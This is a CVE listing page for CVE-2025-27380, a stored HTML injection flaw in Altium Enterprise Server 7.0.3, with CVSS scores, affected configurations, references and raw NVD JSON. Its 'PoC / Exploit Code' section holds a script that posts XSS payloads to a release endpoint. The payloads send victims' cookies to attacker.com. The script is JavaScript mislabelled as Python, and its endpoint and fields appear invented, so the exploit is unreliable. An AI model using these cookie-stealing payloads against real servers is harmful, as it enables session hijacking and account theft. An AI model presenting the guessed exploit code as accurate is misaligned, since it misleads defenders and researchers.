CVE-2025-27380

Description

HTML injection in Project Release in Altium Enterprise Server (AES) 7.0.3 on all platforms allows an authenticated attacker to execute arbitrary JavaScript in the victim’s browser via crafted HTML content.

CVSS Details

CVSS Score

7.6

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:altium:on-prem_enterprise_server:*:*:*:*:*:*:*:* - VULNERABLE

Altium Enterprise Server (AES) 7.0.3

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

// CVE-2025-27380 HTML Injection PoC
// Target: Altium Enterprise Server (AES) 7.0.3
// Type: Stored XSS via Project Release

const fetch = require('node-fetch');

const TARGET_URL = 'https://[TARGET_HOST]/api/ProjectRelease';
const ATTACKER_COOKIE = 'session_cookie_here';

async function exploit() {
  // Malicious HTML payload for XSS execution
  const maliciousPayload = {
    projectId: 'TARGET_PROJECT_ID',
    releaseNotes: '<script>document.location="https://attacker.com/steal?c="+document.cookie</script>',
    version: '1.0.0',
    description: '<img src=x onerror="fetch(\'https://attacker.com/log?data=\'+btoa(document.cookie))">'
  };

  try {
    const response = await fetch(TARGET_URL, {
      method: 'POST',
      headers: {
        'Content-Type': 'application/json',
        'Cookie': `ASP.NET_SessionId=${ATTACKER_COOKIE}`,
        'Authorization': 'Bearer [AUTH_TOKEN]'
      },
      body: JSON.stringify(maliciousPayload)
    });

    console.log('Payload sent. Status:', response.status);
    console.log('XSS will execute when victim views the release page.');
  } catch (error) {
    console.error('Exploitation failed:', error.message);
  }
}

exploit();

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-27380
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-27380
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-27380/
[4] VulDB https://vuldb.com/cve/CVE-2025-27380
[5] https://www.altium.com/platform/security-compliance/security-advisories

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-27380", "sourceIdentifier": "4760f414-e1ae-4ff1-bdad-c7a9c3538b79", "published": "2026-01-22T02:15:51.310", "lastModified": "2026-02-26T21:23:01.390", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "HTML injection in Project Release in Altium Enterprise Server (AES) 7.0.3 on all platforms allows an authenticated attacker to execute arbitrary JavaScript in the victim’s browser via crafted HTML content."}, {"lang": "es", "value": "Inyección HTML en la Versión del Proyecto en Altium Enterprise Server (AES) 7.0.3 en todas las plataformas permite a un atacante autenticado ejecutar JavaScript arbitrario en el navegador de la víctima a través de contenido HTML manipulado."}], "metrics": {"cvssMetricV31": [{"source": "4760f414-e1ae-4ff1-bdad-c7a9c3538b79", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:L/A:N", "baseScore": 7.6, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 4.7}]}, "weaknesses": [{"source": "4760f414-e1ae-4ff1-bdad-c7a9c3538b79", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:altium:on-prem_enterprise_server:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.0.3", "versionEndExcluding": "7.0.6", "matchCriteriaId": "3F31D6A7-989F-4647-AA13-38737112E369"}]}]}], "references": [{"url": "https://www.altium.com/platform/security-compliance/security-advisories", "source": "4760f414-e1ae-4ff1-bdad-c7a9c3538b79", "tags": ["Vendor Advisory"]}]}}